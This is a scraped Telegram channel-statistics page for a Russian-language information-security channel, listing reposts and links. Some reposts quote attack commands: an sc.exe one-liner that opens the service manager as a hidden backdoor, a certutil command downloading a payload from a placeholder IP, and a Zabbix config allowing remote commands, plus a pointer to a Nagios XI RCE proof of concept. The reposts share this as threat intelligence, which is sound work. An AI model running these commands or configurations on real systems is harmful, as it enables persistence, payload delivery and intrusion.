Fsecurity | HH

Відкрити в Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Росія214 687 Технології та додатки30 855

2 010

Підписники

+124 години

-47 днів

-1030 день

123

Перегляди допису

~ 7024 години

~ 8648 годин

6.12%

Коефіцієнт залучення

~ 4

Дописів на день

Ads index

beta

Архів дописів

2 010

🔗Ссылка: https://habr.com/ru/companies/pt/articles/758142/

2 010

🔗Ссылка: https://habr.com/ru/companies/pt/articles/794945/

2 010

🔗Ссылка: https://www.securitylab.ru/news/551747.php

2 010

Repost from APT

👩‍💻 Nagios XI — RCE Nagios XI 2024R1.01 has a vulnerability in the monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution. 🔗 Source: https://github.com/MAWK0235/CVE-2024-24401 #nagios #sql #rce #privesc #poc #exploit

2 010

🔗Ссылка: https://habr.com/ru/companies/first/articles/839496/

2 010

🔗Ссылка: https://habr.com/ru/companies/selectel/articles/840834/

2 010

🔗Ссылка: https://www.securitylab.ru/news/551753.php

2 010

🔗Ссылка: https://spy-soft.net/2fa-bypass-hackerone/

2 010

🔗Ссылка: https://habr.com/ru/companies/cyberok/articles/840506/

2 010

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/840602/

2 010

🔗Ссылка: https://habr.com/ru/companies/drweb/articles/840866/

2 010

🔗Ссылка: https://xakep.ru/2024/09/04/active-listening/

2 010

🔗Ссылка: https://spy-soft.net/sigma-r2024-09-02/

2 010

🔗Ссылка: https://habr.com/ru/companies/kaspersky/articles/840308/

2 010

Repost from 1N73LL1G3NC3

Almost invisible, persistent, fileless, LPE backdoor from an elevated command prompt:

sc.exe sdset scmanager D:(A;;KA;;;WD)

By Gregorz Tworek

2 010

Repost from purple shift

Среди интересных инцидентов прошлого года – выявлен очень незаметный способ закрепиться и латерально перемещаться. Небольшое количество изменений в системе, вне поверхности обычного абузного легитимного win-based и под покрывалом обычного софта. Атакующие приносят нагрузки:

certutil.exe -urlcache -split -f hxxp://<Public IP>/<file with payload>

Используют возможности популярной системы мониторинга Zabbix с конфигурацией, разрешающей удалённое выполнение команд:

EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432

Для Zabbix-агентов на фаерволе злоумышленники открывают порт 5432 с красивым и правильным именем PGSQL. В результате использования этих техник атакующие, очень похожие на группировку Flax Typhoon, более двух лет остаются незамеченными в системе – пока не приходят эксперты по реагированию на инциденты. Подробнее об этой атаке, а также о других интересных инцидентах, расследованных нашими коллегами в прошлом году: https://securelist.com/incident-response-interesting-cases-2023/113611/

2 010

Repost from Омский багхантер

Появилась запись нашего с Сергеем доклада про выгорание 😊

2 010

🔗Ссылка: https://www.anti-malware.ru/news/2024-09-03-114534/44050

2 010

sticker.webp0.29 KB

2 010

Был обновлен Obsidian Pentest 👾 1. Коммит 2. Коммит Приятного чтения 📖 Наш Discord сервер 👆🏻Тут можно пообщаться 🦈